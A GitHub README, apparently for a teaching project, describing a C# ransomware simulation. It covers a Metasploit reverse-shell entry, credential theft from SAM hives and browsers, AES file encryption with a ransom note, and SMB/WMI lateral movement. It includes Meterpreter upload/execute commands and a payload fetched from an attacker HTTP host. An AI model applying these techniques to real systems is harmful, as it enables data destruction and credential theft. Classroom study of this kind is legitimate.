TitDrev/M1CYBER-RaaS
GitHub: TitDrev/M1CYBER-RaaS
一个用于网络安全教学的 C# 勒索软件模拟项目,完整演示了从初始入侵、凭证窃取、文件加密到 SMB 横向传播的全链路攻击过程。
Stars: 0 | Forks: 0
M1CYBER RaaS
Ransomware as a Service — 教学模拟
M1 网络安全 — DIGISEC 2025
## 概述 **M1CYBER RaaS** 是一个完整的勒索软件,使用 **C# (.NET Framework)** 开发,模拟 **Ransomware-as-a-Service** 基础设施,并通过 **Metasploit/Meterpreter** 进行初始访问。 ### 功能 | 阶段 | 描述 | |-------|-------------| | **凭证窃取** | SAM/SYSTEM/SECURITY 配置单元,浏览器密码 (Chrome, Edge),WiFi,cmdkey | | **加密** | AES-256-CBC,`.M1CYBER` 扩展名,完整扫描用户配置文件 + 网络共享 | | **传播** | 通过 SMB/WMI/schtasks 向 Windows Server 2019 AD 进行横向移动 | | **视觉影响** | 修改桌面背景,勒索金额 67 420€,多位置放置 `LISEZ_MOI.txt` 勒索信 | ### 架构 ``` ┌──────────────────────────────────────────────────────────────┐ │ KALI LINUX (192.168.32.130) │ │ msfvenom → raas_payload.exe │ Listener :4444 │ │ HTTP server :8080 │ mcs (cross-compilation) │ └─────────────────────────┬────────────────────────────────────┘ │ Host-Only (VMnet1) ┌───────────────┼───────────────┐ ▼ │ ▼ ┌─────────────────────┐ │ ┌─────────────────────────────────┐ │ WINDOWS 10 │ │ │ WINDOWS SERVER 2019 (AD) │ │ 192.168.32.140 │ │ │ 192.168.32.150 │ │ │ │ │ │ │ 1. raas_payload.exe │ │ │ SMBPropagation ──▶ C$ + WMI │ │ 2. Launcher.exe ────┼───┼──▶│ Launcher.exe → Ransomware.exe │ │ 3. Ransomware.exe │ │ │ *.M1CYBER + LISEZ_MOI.txt │ │ 4. SMBPropagation │ │ │ │ └─────────────────────┘ │ └─────────────────────────────────┘ ``` ## 技术特征 | 组件 | 详情 | |-----------|--------| | **语言** | C# (Mono mcs,Linux → PE32 交叉编译) | | **加密** | AES-256-CBC,每个文件随机生成 IV,PKCS#7 padding | | **二进制格式** | PE32 控制台 (.NET 独立 assembly) | | **目标** | Windows 10/11, Windows Server 2019+ | | **目标依赖** | **无** — 独立可执行文件 | | **C&C** | Metasploit reverse_tcp (Meterpreter) | | **传播** | SMB (C$/ADMIN$), WMI, schtasks, service creation, writable shares | | **凭证提取** | SAM dump, 浏览器 SQLite, netsh WiFi, cmdkey | ## 项目结构 ``` M1CYBER-RaaS/ ├── src/ │ ├── Launcher.cs # Orchestrateur (3 phases) │ ├── Ransomware.cs # Chiffrement AES-256 + wallpaper + ransom note │ ├── CredentialStealer.cs # Vol d'identifiants (SAM, navigateurs, WiFi) │ ├── Decryptor.cs # Restauration des fichiers │ └── SMBPropagation.cs # Mouvement latéral (6 vecteurs) ├── tools/ │ ├── build.sh # Compilation C# → PE32 .exe │ ├── attack.sh # Payload + listener + HTTP │ ├── deploy.sh # Guide Meterpreter │ ├── quicktest.sh # Vérification rapide │ └── precheck.sh # Checklist pré-attaque ├── docs/ │ ├── GUIDE.md # Guide pas à pas │ ├── TECHNICAL.md # Documentation technique │ └── ARCHITECTURE.md # Architecture et flux réseau ├── .gitignore └── LICENSE ``` ## 快速开始 ``` # 安装 git clone https://github.com/TitDrev/M1CYBER-RaaS.git cd M1CYBER-RaaS sudo apt install mono-mcs # 编译 ./tools/build.sh # Attaque ./tools/attack.sh ``` 然后在 Windows 虚拟机上:打开 `http://192.168.32.130:8080`,下载 `raas_payload.exe` 并运行。 建立 Meterpreter 会话后: ``` mkdir C:\M1CYBER upload build/Launcher.exe C:\M1CYBER\ upload build/Ransomware.exe C:\M1CYBER\ upload build/CredentialStealer.exe C:\M1CYBER\ upload build/SMBPropagation.exe C:\M1CYBER\ upload build/Decryptor.exe C:\M1CYBER\ execute -f cmd.exe -a "/c C:\M1CYBER\Launcher.exe" -H ``` **恢复:** `C:\M1CYBER\Decryptor.exe` ## 文档 - **[GUIDE.md](docs/GUIDE.md)** — 完整的分步指南 - **[TECHNICAL.md](docs/TECHNICAL.md)** — 源代码详细分析 - **[ARCHITECTURE.md](docs/ARCHITECTURE.md)** — 网络流量与攻击机制 ## 完整攻击流程 ``` 1. ACCÈS INITIAL msfvenom → raas_payload.exe (reverse_tcp :4444) Meterpreter session établie 2. DÉPLOIEMENT (Meterpreter) upload *.exe → C:\M1CYBER\ execute Launcher.exe 3. PHASE 1 — Vol d'identifiants (CredentialStealer.exe) SAM/SYSTEM/SECURITY → C:\Windows\Temp\_stolen_creds_M1CYBER\ Navigateurs (Chrome, Edge) → URLs + usernames WiFi, cmdkey, infos système 4. PHASE 2 — Chiffrement (Ransomware.exe) Scan récursif profil utilisateur + partages réseau AES-256-CBC, extension .M1CYBER Wallpaper + LISEZ_MOI.txt multi-emplacements Rançon : 67 420 EUR 5. PHASE 3 — Propagation (SMBPropagation.exe) 6 vecteurs essayés séquentiellement : [1] WMI + C$ copy (admin requis) [2] SchTasks SYSTEM (admin requis) [3] C$ mount direct (admin requis) [4] Writable shares enum + remote exec [5] Remote service creation (sc create) [6] NETLOGON/SYSVOL injection 6. IMPACT SERVEUR Launcher.exe → Ransomware.exe sur le serveur Chiffrement fichiers serveur + LISEZ_MOI.txt ``` ## Windows 前置条件(受害者) - **无软件依赖**(独立的 PE32 可执行文件) - Windows Defender、防火墙、UAC 已禁用(实验室环境) - 对于传播:在目标服务器上具有管理员权限的用户账户 ## 可能的扩展 - [ ] 用于密钥的 RSA 非对称加密 - [ ] HTTP/HTTPS C&C 接口 - [ ] 自动数据外泄 - [ ] 持久化 (Registry Run, Scheduled Tasks) - [ ] 代码混淆 (ConfuserEx) - [ ] 反虚拟机 / 反沙箱检测 ## 许可证 MIT — **仅限**教学**用途**。参见 [LICENSE](LICENSE)。M1 网络安全 — DIGISEC 2025
标签:AES加密, PE 加载器, XXE攻击, 勒索软件, 勒索软件即服务, 教育项目, 横向移动, 知识库安全, 编程规范